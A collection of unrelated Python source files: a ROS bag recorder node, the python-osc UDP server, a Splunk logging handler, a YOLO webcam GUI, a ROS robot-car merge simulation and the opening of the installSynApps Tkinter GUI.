## Called on shutdown. Filters the active bag in the directory.
def filter_active_bag(self):
for file in self.bag_path.iterdir():
if file.is_file() and \
file.name.endswith(".bag.active") and \
"DDR_MAINBAGS" in file.name:
self.bags_currently_being_filtered.append(file.name)
self.filter_bag(file.name)
## Takes in an Event message and starts a new bag while getting rid of the
# previous one; it is done this way to create the desired overlap
# @param data ddr_data_recorder/Event.msg - The message we're handling
def recording_callback(self, data):
if data.dynamicRecord:
self.start_recording()
self.data = data
#Checks the previous event and mode to change record processes
if data.eventID != self.previous_event_id or \
data.eventType != self.previous_event_type:
self.active_bag_modes.append(data.eventType)
print("active_bag_modes: ", self.active_bag_modes)
index = DynamicRecorder.get_mode_counter_index(self.bag_path)
if index > self.init_index:
self.bag_process_counter = index + 1
else:
self.bag_process_counter = self.init_index + 1
print("self.bag_process_counter {}".format(
self.bag_process_counter))
self.bag_split_counter = 0
self.bag_name = data.eventType
print("self.bag_name:" + self.bag_name + ":")
self.previous_event_id = data.eventID
self.previous_event_type = data.eventType
self.has_mode_changed = True
self.start_filtering()
def update_ros_connections(self):
capture_folders = glob.glob(
'{}/*/'.format(os.path.expanduser(self.directory)))
for capture_folder in capture_folders:
self.connection_generator.update_capture_ros_connections(
os.path.abspath(capture_folder))
self.connection_generator.clean_up_persistant(
os.path.expanduser(self.directory))
def ros_connections_callback(self, msg):
self.connection_generator.update_capture_ros_connections(msg.data)
if __name__ == "__main__":
rospy.init_node("data_director_event")
try:
DYNAMIC_RECORDER = DynamicRecorder()
rospy.on_shutdown(DYNAMIC_RECORDER.filter_active_bag)
except rospy.ROSInterruptException:
pass
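# A minimal, illustrative sketch of the private ROS parameters this node reads
# (normally supplied by the package launch file, as noted in the class comment
# above). The values are placeholders, and setting them requires a ROS master.
#
# import rospy
# rospy.set_param("topicXML", "/config/topics.xml")  # appended to this file's directory
# rospy.set_param("splitSize", 30)                   # seconds per bag split
# rospy.set_param("directory", "~/ddr_bags")         # where bags are written
# rospy.set_param("testEvent", False)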
|
osc_server.py
|
"""OSC Servers that receive UDP packets and invoke handlers accordingly.
Use like this:
dispatcher = dispatcher.Dispatcher()
# This will print all parameters to stdout.
dispatcher.map("/bpm", print)
server = ForkingOSCUDPServer((ip, port), dispatcher)
server.serve_forever()
or run the server on its own thread:
server = ForkingOSCUDPServer((ip, port), dispatcher)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
...
server.shutdown()
Those servers are using the standard socketserver from the standard library:
http://docs.python.org/library/socketserver.html
Alternatively, the AsyncIOOSCUDPServer server can be integrated with an
asyncio event loop:
loop = asyncio.get_event_loop()
server = AsyncIOOSCUDPServer(server_address, dispatcher, loop)
server.serve()
loop.run_forever()
"""
import asyncio
import os
import socketserver
import time
from pythonosc import osc_bundle
from pythonosc import osc_message
from pythonosc import osc_packet
def _call_handlers_for_packet(data, dispatcher):
"""
This function calls the handlers registered to the dispatcher for
every message it found in the packet.
The process/thread granularity is thus the OSC packet, not the handler.
If parameters were registered with the dispatcher, then the handlers are
called this way:
handler('/address that triggered the message',
registered_param_list, osc_msg_arg1, osc_msg_arg2, ...)
if no parameters were registered, then it is just called like this:
handler('/address that triggered the message',
osc_msg_arg1, osc_msg_arg2, osc_msg_param3, ...)
"""
# Get OSC messages from all bundles or standalone message.
try:
packet = osc_packet.OscPacket(data)
for timed_msg in packet.messages:
now = time.time()
handlers = dispatcher.handlers_for_address(
timed_msg.message.address)
if not handlers:
continue
# If the message is to be handled later, then so be it.
if timed_msg.time > now:
time.sleep(timed_msg.time - now)
for handler in handlers:
if handler.args:
handler.callback(
timed_msg.message.address, handler.args, *timed_msg.message)
else:
handler.callback(timed_msg.message.address, *timed_msg.message)
except osc_packet.ParseError:
pass
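# An illustrative sketch of the two handler call styles described in the
# docstring above; the addresses and handler names are placeholders, not part
# of this module.
#
# from pythonosc.dispatcher import Dispatcher
#
# def with_params(address, fixed_args, *osc_args):
#     print(address, fixed_args, osc_args)  # registered args arrive before OSC args
#
# def without_params(address, *osc_args):
#     print(address, osc_args)
#
# d = Dispatcher()
# d.map("/filter", with_params, "lowpass")  # handler.args == ["lowpass"]
# d.map("/bpm", without_params)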
class _UDPHandler(socketserver.BaseRequestHandler):
"""Handles correct UDP messages for all types of server.
Whether this will be run on its own thread, the server's or a whole new
process depends on the server you instantiated, look at their documentation.
This method is called after a basic sanity check was done on the datagram,
basically whether this datagram looks like an osc message or bundle,
if not the server won't even bother to call it and so no new
threads/processes will be spawned.
"""
def handle(self):
_call_handlers_for_packet(self.request[0], self.server.dispatcher)
def _is_valid_request(request):
"""Returns true if the request's data looks like an osc bundle or message."""
data = request[0]
return (
osc_bundle.OscBundle.dgram_is_bundle(data)
or osc_message.OscMessage.dgram_is_message(data))
class OSCUDPServer(socketserver.UDPServer):
"""Superclass for different flavors of OSCUDPServer"""
def __init__(self, server_address, dispatcher):
super().__init__(server_address, _UDPHandler)
self._dispatcher = dispatcher
def verify_request(self, request, client_address):
"""Returns true if the data looks like a valid OSC UDP datagram."""
return _is_valid_request(request)
@property
def dispatcher(self):
"""Dispatcher accessor for handlers to dispatch osc messages."""
return self._dispatcher
class BlockingOSCUDPServer(OSCUDPServer):
"""Blocking version of the UDP server.
Each message will be handled sequentially on the same thread.
Use this if you don't care about latency in your message handling or don't
have a multiprocess/multithread environment (really?).
"""
class ThreadingOSCUDPServer(socketserver.ThreadingMixIn, OSCUDPServer):
"""Threading version of the OSC UDP server.
Each message will be handled in its own new thread.
Use this when lightweight operations are done by each message handler.
"""
if hasattr(os, "fork"):
class ForkingOSCUDPServer(socketserver.ForkingMixIn, OSCUDPServer):
"""Forking version of the OSC UDP server.
Each message will be handled in its own new process.
Use this when heavyweight operations are done by each message handler
and forking a whole new process for each of them is worth it.
"""
class AsyncIOOSCUDPServer():
"""Asyncio version of the OSC UDP Server.
Each UDP message is handled by _call_handlers_for_packet, the same method as in the
OSCUDPServer family of blocking, threading, and forking servers
"""
def __init__(self, server_address, dispatcher, loop):
"""
:param server_address: tuple of (IP address to bind to, port)
:param dispatcher: a pythonosc.dispatcher.Dispatcher
:param loop: an asyncio event loop
"""
self._server_address = server_address
self._dispatcher = dispatcher
self._loop = loop
class _OSCProtocolFactory(asyncio.DatagramProtocol):
"""OSC protocol factory which passes datagrams to _call_handlers_for_packet"""
def __init__(self, dispatcher):
self.dispatcher = dispatcher
def datagram_received(self, data, unused_addr):
_call_handlers_for_packet(data, self.dispatcher)
def serve(self):
"""Creates a datagram endpoint and registers it with our event loop.
Use this only if you are not currently running your asyncio loop.
(i.e. not from within a coroutine).
"""
self._loop.run_until_complete(self.create_serve_endpoint())
def create_serve_endpoint(self):
"""Creates a datagram endpoint and registers it with our event loop as coroutine."""
return self._loop.create_datagram_endpoint(
lambda: self._OSCProtocolFactory(self.dispatcher),
local_addr=self._server_address)
@property
def dispatcher(self):
return self._dispatcher
|
__init__.py
|
import atexit
import json
import logging
import socket
import time
import traceback
from threading import Thread
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
instances = [] # For keeping track of running class instances
DEFAULT_QUEUE_SIZE = 5000
# Called when application exit imminent (main thread ended / got kill signal)
@atexit.register
def perform_exit():
for instance in instances:
try:
instance.shutdown()
except Exception:
pass
def force_flush():
for instance in instances:
try:
instance.force_flush()
except Exception:
pass
def wait_until_empty():
for instance in instances:
try:
instance.wait_until_empty()
except Exception:
pass
class SplunkHandler(logging.Handler):
"""
A logging handler to send events to a Splunk Enterprise instance
running the Splunk HTTP Event Collector.
"""
def __init__(self, host, port, token, index,
allow_overrides=False, debug=False, flush_interval=15.0,
force_keep_ahead=False, hostname=None,
protocol='https', proxies=None,
queue_size=DEFAULT_QUEUE_SIZE, record_format=False,
retry_backoff=2.0, retry_count=5, source=None,
sourcetype='text', timeout=60, url=None, verify=True):
"""
Args:
host (str): The Splunk host param
port (int): The port the host is listening on
token (str): Authentication token
index (str): Splunk index to write to
allow_overrides (bool): Whether to look for _<param>
in log data (ex: _index)
debug (bool): Whether to print debug console messages
flush_interval (float): How often to push events
to splunk host in seconds
force_keep_ahead (bool): Sleep instead of dropping
logs when queue fills
hostname (str): The Splunk Enterprise hostname
protocol (str): The web protocol to use
proxies (dict): The proxies to use for the request
queue_size (int): The max number of logs to queue,
set to 0 for no max
record_format (bool): Whether the log record will be json
retry_backoff (float): The requests lib backoff factor
retry_count (int): The number of times to retry a failed request
source (str): The Splunk source param
sourcetype (str): The Splunk sourcetype param
timeout (float): The time to wait for a response from Splunk
url (str): Override of the url to send the event to
verify (bool): Whether to perform ssl certificate validation
"""
global instances
instances.append(self)
logging.Handler.__init__(self)
self.allow_overrides = allow_overrides
self.host = host
self.port = port
self.token = token
self.index = index
self.source = source
self.sourcetype = sourcetype
self.verify = verify
self.timeout = timeout
self.flush_interval = flush_interval
self.force_keep_ahead = force_keep_ahead
self.log_payload = ""
self.SIGTERM = False # 'True' if application requested exit
self.timer = None
# It is possible to get 'behind' and never catch
# up, so we limit the queue size
self.queue = list()
self.max_queue_size = max(queue_size, 0) # 0 is min queue size
self.debug = debug
self.session = requests.Session()
self.retry_count = retry_count
self.retry_backoff = retry_backoff
self.protocol = protocol
self.proxies = proxies
self.record_format = record_format
self.processing_payload = False
self.running = False
if not url:
self.url = '%s://%s:%s/services/collector' % (self.protocol,
self.host,
self.port)
else:
self.url = url
# Keep ahead depends on queue size, so cannot be 0
if self.force_keep_ahead and not self.max_queue_size:
self.write_log(
"Cannot keep ahead of unbound queue, using default queue size")
self.max_queue_size = DEFAULT_QUEUE_SIZE
self.write_debug_log("Starting debug mode")
if hostname is None:
self.hostname = socket.gethostname()
else:
self.hostname = hostname
self.write_debug_log("Preparing to override loggers")
# prevent infinite recursion by silencing requests and urllib3 loggers
logging.getLogger('requests').propagate = False
logging.getLogger('urllib3').propagate = False
# and do the same for ourselves
logging.getLogger(__name__).propagate = False
# disable all warnings from urllib3 package
if not self.verify:
requests.packages.urllib3.disable_warnings()
if self.verify and self.protocol == 'http':
print("[SplunkHandler DEBUG] "
+ 'cannot use SSL verification with an insecure (http) connection')
if self.proxies is not None:
self.session.proxies = self.proxies
# Set up automatic retry with back-off
self.write_debug_log("Preparing to create a Requests session")
retry = Retry(total=self.retry_count,
backoff_factor=self.retry_backoff,
method_whitelist=False, # Retry for any HTTP verb
status_forcelist=[500, 502, 503, 504])
self.session.mount(self.protocol
+ '://', HTTPAdapter(max_retries=retry))
self.worker_thread = None
self.start_worker_thread()
self.write_debug_log("Class initialize complete")
def emit(self, record):
self.write_debug_log("emit() called")
try:
record = self.format_record(record)
except Exception as e:
self.write_log("Exception in Splunk logging handler: %s" % str(e))
self.write_log(traceback.format_exc())
return
if self.flush_interval <= 0:
# Flush log immediately; is blocking call
self._send_payload(payload=record)
return
self.write_debug_log("Writing record to log queue")
# If force keep ahead, sleep until space
# in queue to prevent falling behind
while self.force_keep_ahead and len(self.queue) >= self.max_queue_size:
time.sleep(self.alt_flush_interval)
# Put log message into queue; worker thread will pick up
if not self.max_queue_size or len(self.queue) < self.max_queue_size:
self.queue.append(record)
else:
self.write_log("Log queue full; log data will be dropped.")
def close(self):
self.shutdown()
logging.Handler.close(self)
#
# helper methods
#
def start_worker_thread(self):
# Start a worker thread responsible for sending logs
self.write_debug_log("Starting worker thread.")
self.worker_thread = Thread(target=self._splunk_worker)
# Auto-kill thread if main process exits
self.worker_thread.daemon = True
self.worker_thread.start()
def write_log(self, log_message):
print("[SplunkHandler] " + log_message)
def write_debug_log(self, log_message):
if self.debug:
print("[SplunkHandler DEBUG] " + log_message)
def format_record(self, record):
self.write_debug_log("format_record() called")
params = {
'time': self.getsplunkattr(record, '_time', time.time()),
'host': self.getsplunkattr(record, '_host', self.hostname),
'index': self.getsplunkattr(record, '_index', self.index),
'source': record.pathname if self.source is None else self.source
}
params['sourcetype'] = self.getServiceName(params.get('host'))
params['event'] = self.format(record)
self.write_debug_log("Record dictionary created")
formatted_record = json.dumps(params, sort_keys=True)
self.write_debug_log("Record formatting complete")
return formatted_record
def getServiceName(self, hostname):
service_group = hostname.split('-')
if len(service_group) > 2:
return service_group[0] + '-' + service_group[1]
else:
return hostname
def getsplunkattr(self, obj, attr, default=None):
val = default
if self.allow_overrides:
val = getattr(obj, attr, default)
try:
delattr(obj, attr)
except Exception:
pass
return val
def _send_payload(self, payload):
r = self.session.post(
self.url,
data=payload,
headers={'Authorization': "Splunk %s" % self.token},
verify=self.verify,
timeout=self.timeout
)
r.raise_for_status() # Throws exception for 4xx/5xx status
def _flush_logs(self):
self.processing_payload = True
payload = self.empty_queue()
if payload:
self.write_debug_log("Payload available for sending")
self.write_debug_log("Destination URL is " + self.url)
try:
self.write_debug_log("Sending payload: " + payload)
self._send_payload(payload)
self.write_debug_log("Payload sent successfully")
except Exception as e:
try:
self.write_log(
"Exception in Splunk logging handler: %s" % str(e))
self.write_log(traceback.format_exc())
except Exception:
self.write_debug_log(
"Exception encountered," +
"but traceback could not be formatted"
)
else:
self.write_debug_log("No payload was available to send")
self.processing_payload = False
def _splunk_worker(self):
time_end = 0
time_start = 0
self.running = True
while self.running:
sleep_amount = self.flush_interval - (time_end - time_start)
time.sleep(max(sleep_amount, 0))
time_start = time.time()
self._flush_logs()
if self.SIGTERM:
self.write_debug_log(
"Timer reset aborted due to SIGTERM received")
self.running = False
time_end = time.time()
def empty_queue(self):
if len(self.queue) == 0:
self.write_debug_log("Queue was empty")
return ""
self.write_debug_log("Creating payload")
log_payload = ""
if self.SIGTERM:
log_payload += ''.join(self.queue)
self.queue.clear()
else:
# without looking at each item,
# estimate how many can fit in 50 MB
apprx_size_base = len(self.queue[0])
# dont count more than what is in queue
# to ensure the same number as pulled are deleted
# Note (avass): 524288 is 50MB/100
count = min(int(524288 / apprx_size_base), len(self.queue))
log_payload += ''.join(self.queue[:count])
del self.queue[:count]
self.write_debug_log("Queue task completed")
return log_payload
def force_flush(self):
self.write_debug_log("Force flush requested")
self._flush_logs()
self.wait_until_empty() # guarantees queue is emptied
def shutdown(self):
self.write_debug_log("Immediate shutdown requested")
# Only initiate shutdown once
if self.SIGTERM:
return
self.write_debug_log("Setting instance SIGTERM=True")
self.running = False
self.SIGTERM = True
self.write_debug_log(
"Starting up the final run of the worker thread before shutdown")
# Send the remaining items that might be sitting in queue.
self._flush_logs()
self.wait_until_empty() # guarantees queue is emptied before exit
def wait_until_empty(self):
self.write_debug_log("Waiting until queue empty")
while len(self.queue) > 0 or self.processing_payload:
self.write_debug_log("Current queue size: " + str(len(self.queue)))
time.sleep(self.alt_flush_interval)
@property
def alt_flush_interval(self):
return min(1.0, self.flush_interval / 2)
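# --- Usage sketch (illustrative only, not part of the original module) ---
# A minimal example of attaching this handler to the standard logging module.
# The constructor arguments shown (host, port, token, index) are assumptions based on
# typical Splunk HTTP Event Collector handlers; the actual __init__ signature is
# defined earlier in this file and may differ.
#
#   import logging
#   splunk_handler = SplunkHandler(host='splunk.example.com', port=8088,
#                                  token='YOUR_HEC_TOKEN', index='main')
#   logging.getLogger().addHandler(splunk_handler)
#   logging.getLogger().warning('hello from SplunkHandler')
#   splunk_handler.force_flush()  # push any queued events immediately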
|
sonmari.py
|
import sys
from os import system
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5 import uic
import cv2
import argparse
import sonmari_video as sv
import darknet
from threading import Thread, enumerate
from queue import Queue
def parser():
parser = argparse.ArgumentParser(description="YOLO Object Detection")
parser.add_argument("--input", type=str, default=0,
help="video source. If empty, uses webcam 0 stream")
parser.add_argument("--out_filename", type=str, default="",
help="inference video name. Not saved if empty")
parser.add_argument("--weights", default="./model/yolov4-obj_96_best.weights",
help="yolo weights path")
parser.add_argument("--dont_show", action='store_true',
help="windown inference display. For headless systems")
parser.add_argument("--ext_output", action='store_true',
help="display bbox coordinates of detected objects")
parser.add_argument("--config_file", default="./cfg/yolov4-obj.cfg",
help="path to config file")
parser.add_argument("--data_file", default="./data/obj.data",
help="path to data file")
parser.add_argument("--thresh", type=float, default=.70,
help="remove detections with confidence below this value")
return parser.parse_args()
# Load the UI file
# Note: the UI file must be located in the same directory as this Python file.
form_class = uic.loadUiType("sonmariui.ui")[0]
# Declare the class used to display the main window
class SonmariWindow(QMainWindow, form_class) :
def __init__(self) :
super().__init__()
self.setupUi(self)
self.pixmap = QPixmap()
self.pixmap.load("logo.png")
self.pixmap = self.pixmap.scaledToWidth(100)
self.icon.setPixmap(self.pixmap)
# Add the icon
args = parser()
frame_queue = Queue()
darknet_image_queue = Queue(maxsize=1)
detections_queue = Queue(maxsize=1)
fps_queue = Queue(maxsize=1)
network, class_names, class_colors = darknet.load_network(
args.config_file,
args.data_file,
args.weights,
batch_size=1
)
width = darknet.network_width(network)
height = darknet.network_height(network)
# Capture from the webcam; keep a reference on self so keyPressEvent can release it
self.cap = cv2.VideoCapture(0)
# Capture thread
Thread(target=sv.video_capture, args=(self.cap, width, height, frame_queue, darknet_image_queue)).start()
# Detection thread
Thread(target=sv.inference, args=(self.cap, args, network, class_names, darknet_image_queue, detections_queue, fps_queue)).start()
# Drawing (output) thread
Thread(target=sv.drawing, args=(self.cap, self, args, width, height, class_colors, frame_queue, detections_queue, fps_queue)).start()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Escape:
self.close()
self.cap.release()
# Exit when ESC is pressed
if __name__ == "__main__" :
# QApplication: the class that runs the application
app = QApplication(sys.argv)
# Create an instance of the window class
sonmariWindow = SonmariWindow()
# Show the application window
sonmariWindow.show()
# Enter the event loop (this is what actually runs the application)
app.exec_()
sys.exit()
|
nkMergeSim.py
|
#!/usr/bin/env python
#author Nikhil Kanamarla
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import math
from matplotlib import style
from Points import BuildPath
from std_msgs.msg import String
import rospy
import tf
import time
import datetime ##
import numpy as np
from numpy.linalg import inv,pinv
from threading import Thread, Lock
from geometry_msgs.msg import TransformStamped
from line_following.srv import *
import Path
import copy
isRun = True
style.use('fivethirtyeight')
fig = plt.figure()
ax1 = fig.add_subplot(1,1,1)
#t = 0
xs0,ys0,xs1,ys1,xc0,yc0,xc1,yc1,xm,ym = BuildPath(0.05)
posx = [0]*36
posy = [0]*36
#index1=9
#name1="zumoTest9"
index2=10
name2="zumoTest10"
#index3=11
#name3="zumoTest11"
#index4=14
#name4="zumoTest14"
#index5=15
#name5="zumoTest15"
#index6=35
#name6="zumoTest35"
#road 1 upper
#posx[index1] = 0.55
#posy[index1] = -0.98
#posx[] = 0.85
#posy[index2] = -0.98
#posx[12] =1.15
#posy[12] = -0.98
#posx[index3] = 1.45
#posy[index3] = -0.98
#posx[12] = 1.75
#posy[12] = -0.98
posx[index2] = 2
posy[index2] = -0.98
#road 2 lower
#posx[index4] = -1.43
#posy[index4] = 0.25
#posx[index5] = -1.7
#posy[index5] = -.144
#posx[index6] = -2.183
#posy[index6] = -.23
#posx[32] = -.2
#posy[32] =1.2
#posx[34] = .3
#posy[34] = 1.2
#posx[9] = .8
#posy[9] = 1.2
#posx[10] = 1.3
#posy[10] = 1.2
#posx[32] = 1.8
#posy[32] = 1.2
def watchout():
print("it's working")
def talker(index,x,y,drx,dry,sp):
global pub
pub.publish(str(index)+","+str(x)+","+str(y)+","+str(drx)+","+str(dry)+","+str(sp))
def RT_control(to,tmi,xi,xf,v,vf):
A_mtx = np.matrix([[to**3/6,to**2/2,to,1],[to**2/2,to,1,0],[tmi**3/6,tmi**2/2,tmi,1],[tmi**2/2,tmi,1,0]])
Y_mtx = np.matrix([[xi],[v],[xf],[vf]])
A_aux = np.transpose(A_mtx)*A_mtx
X_mtx = pinv(A_aux)*np.transpose(A_mtx)*Y_mtx
return X_mtx
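# Illustrative note (not part of the original script): RT_control solves for the
# coefficients X = [a, b, c, d]^T of a cubic position profile
#   x(t) = a*t^3/6 + b*t^2/2 + c*t + d,  with velocity v(t) = a*t^2/2 + b*t + c,
# subject to (position, velocity) = (xi, v) at t = to and (xf, vf) at t = tmi,
# using the pseudo-inverse of A^T*A. Hypothetical example of evaluating the speed,
# mirroring how zumoThread uses the result below:
#   abcd = RT_control(0.0, 5.0, 0.0, 1.0, 0.2, 0.2)
#   t = 2.5
#   speed_at_t = (0.5*abcd[0]*t*t + abcd[1]*t + abcd[2]).item(0)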
def animate(i):
#global t
global xs0#long road
global ys0#Long road
global xs1
global ys1
ax1.clear()
#the dot at 0,0 is caused by having extra indexes here that don't correspond to an actual car in the sim.
#ax1.scatter(posx[index1],posy[index1],c='b',s=300)
ax1.scatter(posx[index2],posy[index2],c='b',s=300)
#ax1.scatter(posx[index3],posy[index3],c='b',s=300)
#ax1.scatter(posx[index4],posy[index4],c='r',s=300)
#ax1.scatter(posx[index5],posy[index5],c='r',s=300)
#ax1.scatter(posx[index6],posy[index6],c='r',s=300)
#ax1.scatter(posx[18],posy[18],c='r',s=300)
#ax1.scatter(posx[19],posy[19],c='r',s=300)
#ax1.scatter(posx[21],posy[21],c='r',s=300)
#ax1.scatter(posx[22],posy[22],c='r',s=300)
#ax1.scatter(posx[30],posy[30],c='r',s=300)
#ax1.scatter(posx[31],posy[31],c='r',s=300)
#ax1.scatter(posx[32],posy[32],c='r',s=300)
#chris added these scatters to fully plot all 10 cars
#ax1.scatter(posx[33],posy[33],c='r',s=300)
#ax1.scatter(posx[12],posy[12],c='r',s=300)
#ax1.scatter(posx[28],posy[28],c='r',s=300)
#ax1.scatter(posx[34],posy[34],c='r',s=300)
#ax1.scatter(posx[9],posy[9],c='r',s=300)
ax1.plot(xs0,ys0,'g')
ax1.plot(xs1,ys1,'b')
ax1.plot(xc0,yc0,'y')
ax1.plot(xc1,yc1,'y')
ax1.plot(xm,ym,'k')
ax1.set_xlim([3.048,-3.048])
ax1.set_ylim([1.524,-4.5])
def zumoThread(index, frameName, controlRate, path):
#zumoThread inputs: index (car number) frameName (car name in Vicon), controlRate (???), path (car's path from path.py)
print("hello")
global posx
global posy
x = posx[index]
y = posy[index]
status = path.GetSegmentIDNoCheck()#return the Path segment number
road_speed = 0.2 #speed limit on the road unless intervened by from the controller
speed = road_speed #*1.145 #linear scaling factor 1.145 to achieve 0.30 actual
nf = rospy.ServiceProxy('lf_grad', LineFollowing) #nf is the result of the LineFollowing service call which we name 'lf_grad', look in folder srv to see inputs and outputs
nf_m = rospy.ServiceProxy('lf_merge', MergeControl)
cur_t = time.time()
dx = 0.0 #initialize gradient direction vectors
dy = 0.0
isControlled = False #initially not in the control region
abcd = np.matrix([[0],[0],[0],[0]]) #initialize an RT_control matrix
tinit = 0
controlInfoPre = (None,None)
while isRun:
temp_t = time.time()
x = x + dx*speed*(temp_t-cur_t) #Note temp_t and cur_t names seem to be backward
y = y + dy*speed*(temp_t-cur_t)
posx[index] = x #index refers to the car number, update that cars x position
posy[index] = y
talker(index,x,y,dx,dy,speed) #publish the cars number, its position, the desired vector to the next position and its desired speed
cur_t = temp_t
rospy.wait_for_service('lf_grad')
try:
resp = nf(status, x, y) # from the LineFollowing service, the output res,dx,dy is saved as (ros object?) resp
res = [resp.res, resp.dx, resp.dy] # turn the ros object resp into a "useable" vector
status = path.GetSegmentID(x,y) #
####################################################
#stop the car at the end of the path
if status==5: #status is the source number of the segment of arc (check mapbuilder.cpp)
road_speed = 0.0
if res[0] == 0:
dx = res[1]
dy = res[2]
elif res[0]==2:
pass
else:
print "Zumo "+str(index)+" Cannot Run NF."
except rospy.ServiceException, e:
print "Service call failed: %s"%e
controlInfo = path.CheckControl(x, y) #controlInfo can be 0,1,2 zero is in control region (L), one is in the merge region, and two is exiting the merge region. Check control checks if the position is > or < a specified transition condition
if (controlInfo is not None) and (controlInfo != controlInfoPre): #if the position falls in the control region
if controlInfo[0] == 0:
rospy.wait_for_service('lf_merge') #if
mf = nf_m(index,controlInfo[1],controlInfo[2],0,road_speed)
if mf.isFirst:
isControlled = False
else:
isControlled = True
abcd = RT_control(time.time()-mf.tinit,mf.tmi-mf.tinit,0,mf.L,road_speed,road_speed)
tinit = mf.tinit
#print "Robot "+str(index)+": to->"+str(time.time()-mf.tinit)+" tmi->"+str(mf.tmi-mf.tinit)+" xi->0 xf->"+str(mf.L)+" v->"+str(cur_speed)+" vf->"+str(cur_speed)
#print "ABCD: "+str(abcd)
elif controlInfo[0] == 2:
isControlled = False
rospy.wait_for_service('lf_merge')
mf = nf_m(index,controlInfo[1],controlInfo[2],1,road_speed)
elif controlInfo[0] == 1:
isControlled = False
controlInfoPre = controlInfo
if not isControlled:
speed = road_speed #*1.145 #this is a correction that is added to the real robot control and is removed here because
else:
temps = 0.5*abcd[0]*(time.time()-tinit)*(time.time()-tinit)+abcd[1]*(time.time()-tinit)+abcd[2]
ttemps = temps.item(0)
speed = ttemps #*1.145
#if speed >0.7:
#speed = 0.7
time.sleep(controlRate)
rospy.init_node('zumo_go', anonymous=True)#zumo_go is a node
pub = rospy.Publisher('/ZumoRefs', String, queue_size=1000)#ZumoRefs is a topic name
#one zipper merge starting positions
#t1 = Thread(target = zumoThread, args = (index1, name1, 0.05, copy.deepcopy(Path.GetDefaultPath(8))))
#t1.start()
#index2=car 10 and path 40
t1 = Thread(target = zumoThread, args = (index2, name2, 0.05, copy.deepcopy(Path.GetDefaultPath(40))))
t1.start()
#t3 = Thread(target = zumoThread, args = (index3, name3, 0.05, copy.deepcopy(Path.GetDefaultPath(8))))
#t3.start()
#t4 = Thread(target = zumoThread, args = (5, "zumoTest5", 0.05, copy.deepcopy(Path.GetDefaultPath(8))))
#t4.start()
#t5 = Thread(target = zumoThread, args = (12, "zumoTest12", 0.05, copy.deepcopy(Path.GetDefaultPath(8))))
#t5.start()
#t11 = Thread(target = zumoThread, args = (index4, name4, 0.05, copy.deepcopy(Path.GetDefaultPath(0))))
#t11.start()
#t12 = Thread(target = zumoThread, args = (index5, name5, 0.05, copy.deepcopy(Path.GetDefaultPath(0))))
#t12.start()
#t13 = Thread(target = zumoThread, args = (index6, name6, 0.05, copy.deepcopy(Path.GetDefaultPath(0))))
#t13.start()
#t15 = Thread(target = zumoThread, args = (9, "zumoTest9", 0.05, copy.deepcopy(Path.GetDefaultPath(3))))
#t15.start()
#t16 = Thread(target = zumoThread, args = (10, "zumoTest10", 0.05, copy.deepcopy(Path.GetDefaultPath(3))))
#t16.start()
#t17 = Thread(target = zumoThread, args = (34, "zumoTest34", 0.05, copy.deepcopy(Path.GetDefaultPath(3))))
#t17.start()
#t18 = Thread(target = zumoThread, args = (32, "zumoTest32", 0.05, copy.deepcopy(Path.GetDefaultPath(3))))
#t18.start()
#t19 = Thread(target = zumoThread, args = (10, "zumoTest10", 0.05, copy.deepcopy(Path.GetDefaultPath(3))))
#t19.start()
ani = animation.FuncAnimation(fig, animate, interval=100)
plt.axis('equal')
plt.show()
isRun = False
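# Usage note (illustrative): this script expects a running ROS master and the
# 'lf_grad' (LineFollowing) and 'lf_merge' (MergeControl) services from the
# line_following package to be available before the zumoThread loop can proceed,
# since it blocks on rospy.wait_for_service(). Start roscore and the service nodes
# first, then run this script; the exact launch procedure is an assumption here.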
|
installGUI.py
|
#!/usr/bin/env python3
"""GUI class for the installSynApps module
This GUI solution allows for much easier use of the installSynApps module
to clone, update, and build the EPICS and synApps software stack.
"""
# Tkinter imports
import tkinter as tk
from tkinter import *
from tkinter import messagebox
from tkinter import filedialog
from tkinter import simpledialog
from tkinter import font as tkFont
import tkinter.scrolledtext as ScrolledText
# pygithub for github autosync tags integration.
WITH_PYGITHUB=True
try:
from github import Github
except ImportError:
WITH_PYGITHUB=False
# Some python utility libs
import os
import time
import shutil
import datetime
import threading
import webbrowser
import subprocess
from sys import platform
# installSynApps module imports
import installSynApps
import installSynApps.DataModel as DataModel
import installSynApps.IO as IO
import installSynApps.Driver as Driver
import installSynApps.ViewModel as ViewModel
class InstallSynAppsGUI:
"""
Class representing GUI for using installSynApps
Attributes
----------
master : Tk
the root frame of the GUI
smallFont, largeFont
tkfonts used by the application
control buttons
8 tk buttons linked to control operations
log and configPanel
scrollable panels that display current information
thread and loadingIconThread
threads used for asynchronous usage of the module
installSynApps modules
loaded instances of installSynApps objects that drive the process
Methods
-------
loadingLoop
Method that creates a loading animation
writeToLog
Method that appends to the log
showMessage, showWarningMessage, showErrorMessage
Methods for displaying output messages
initLogText
returns initial log text
updateConfigPanel
Syncs the config panel with the currently loaded config
updateAllRefs
Updates references to install config so that build remains consistent
recheckDeps
Function that checks if dependencies are in the system path
newConfig
Function that asks user for an install location, and then loads a basic install config with that path.
loadConfig
event function that opens a directory selection prompt and loads the configure directory if it is valid
saveConfig
overwrites the existing config path with whatever changes had been added
saveConfigAs
Opens dialog for file path, and saves to a specific directory
openEditWindow
Function that opens appropriate edit window depending on argument.
injectFilesProcess
process function for injecting into files
updateConfigProcess
process function for updating RELEASE and configuration files
cloneConfigProcess
process function for cloning all selected modules
buildConfigProcess
process function for building all selected modules
autorunProcess
process function that runs the full sequence of clone, update, inject, and build operations
loadHelp
prints help information
saveLog
prompts for save location of log file
"""
def __init__(self, master):
""" Constructor for InstallSynAppGUI """
# Initialize the frame and window
self.master = master
self.master.protocol('WM_DELETE_WINDOW', self.close_cleanup)
self.smallFont = tkFont.Font(family = "Helvetica", size = 10)
self.largeFont = tkFont.Font(family = "Helvetica", size = 14)
frame = Frame(self.master)
frame.pack()
IO.logger.assign_write_function(self.writeToLog)
# core count, dependency install, and popups toggles
self.showPopups = tk.BooleanVar()
self.showPopups.set(False)
self.installDep = tk.BooleanVar()
self.installDep.set(False)
self.singleCore = tk.BooleanVar()
self.singleCore.set(False)
# Debug toggles
self.showDebug = tk.BooleanVar()
self.showDebug.set(False)
self.showCommands = tk.BooleanVar()
self.showCommands.set(False)
self.generateLogFile = tk.BooleanVar()
self.generateLogFile.set(False)
